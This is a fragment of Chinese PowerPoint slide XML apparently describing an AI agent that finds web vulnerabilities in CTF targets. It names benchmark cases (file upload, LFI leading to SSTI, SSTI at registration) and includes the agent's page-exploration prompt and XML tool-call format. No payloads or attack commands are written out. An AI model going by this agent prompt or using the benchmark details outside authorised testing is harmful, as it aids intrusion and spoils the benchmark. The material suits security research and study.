            <a:chExt cx="12922" cy="850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="圆角矩形 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="405" y="1797"/>
              <a:ext cx="10481" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="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custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601" y="1911"/>
              <a:ext cx="12726" cy="58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数据依赖</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下订单</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订单列表</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查看订单</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修改订单</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删除订单</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sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1033145"/>
            <a:ext cx="7444740" cy="521970"/>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漏洞存在于业务逻辑的交互中，而非孤立的代码里。</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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974850" y="1670685"/>
            <a:ext cx="3187700" cy="521970"/>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孤立检测</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高误报</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漏报</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37" name="图片 36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2976540" y="2192655"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817880" y="4856480"/>
            <a:ext cx="5541645" cy="521970"/>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提供上下文</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指引方向</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降低误报率</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6" name="图片 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2977810" y="4268470"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="圆角矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7430135" y="1423035"/>
            <a:ext cx="3949700" cy="2580005"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7091"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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8" name="图片 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2976540" y="5426710"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424305" y="6008370"/>
            <a:ext cx="4935220" cy="521970"/>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场景感知检测</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漏洞与业务强</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关联</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2" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570470" y="1530985"/>
            <a:ext cx="3668395" cy="1725295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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XBEN-022</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文件上传</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 LFI -&gt; SSTI</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1）</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理解</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error_type在</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上传与文件包含接口的数据流传递</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关系</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2）</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综合多个漏洞接口顺序</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调用</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3" name="圆角矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7416165" y="4537075"/>
            <a:ext cx="3949700" cy="1828165"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7091"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="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custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556500" y="4645025"/>
            <a:ext cx="3668395" cy="1725295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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XBEN-025、056</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SSTI</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出现在注册</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最后一步</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1）</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控制流</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注册</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用户名渲染</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圆角矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698615" y="2647315"/>
            <a:ext cx="5024120" cy="1066165"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11670"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="951230"/>
            <a:ext cx="5412740" cy="5593715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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关键步骤一</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页面探索</a:t>
            </a:r>
            <a:endPar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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1068070"/>
            <a:ext cx="5345430" cy="5477510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你可以根据已有的信息和网站功能进行网页的浏览与探索，你需要在一个回答里把所有需要探索的网页都探索完成。</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要集中于获取更多网页交互请求，即需要进行以下操作：</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要尽可能地使用当前已经获取到的关键信息，比如收集到的用户名和密码需要尽可能使用，不要自己直接构造，注意不要爆破参数，每个参数只需要测试最可能的值即可；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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要访问所有原页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>接口，保证所有新页面都要访问到，关键信息中可能提示的参数也需要使用，当你构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>请求参数时需要严格按照页面表单中的参数构造</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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>尽可能多的访问新网页或对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>发送网络请求，只能发送正常请求参数，不可以进行漏洞探测，不可以发送任何危险参数</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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>格式返回响应</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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>如果没有当前页面则为初始请求，访问系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>即可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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>不要访问登出功能，不要访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>和图像，不要通过猜测路径获取新页面，如果所有已知的路径均访问完成，返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>任务已完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>即可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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>如果是修改用户信息（包括密码）请求，请将修改后的信息和原信息设置为一样，避免篡改信息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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>对于工具请求的构造，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>由多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>子标签构成，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>子标签中的值出现特殊字符，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>&lt;![CDATA[</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你需要返回的调用网络请求工具格式如下：</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&lt;step&gt;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&lt;tool&gt;request&lt;/tool&gt;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{request_desc}</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&lt;/step&gt;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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5927725" y="1068070"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6595110" y="1131570"/>
            <a:ext cx="1581150" cy="447675"/>
            <a:chOff x="10501" y="1782"/>
            <a:chExt cx="2490" cy="705"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10634" y="1826"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11201" y="1791"/>
              <a:ext cx="1789" cy="58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CTF URL</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12" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10501" y="1782"/>
              <a:ext cx="2490" cy="70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14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5927725" y="2651125"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6594475" y="2239645"/>
            <a:ext cx="5209540" cy="1577975"/>
            <a:chOff x="10501" y="1782"/>
            <a:chExt cx="3673" cy="2809"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文本框 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10840" y="1791"/>
              <a:ext cx="2595" cy="656"/>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Request XML</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18" name="圆角矩形 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10501" y="1782"/>
              <a:ext cx="3673" cy="2809"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11670"/>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4" name="图片 23" descr="xml"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6685915" y="2260600"/>
            <a:ext cx="360000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6695440" y="2651125"/>
            <a:ext cx="5024120" cy="1065530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a14:hiddenFill>
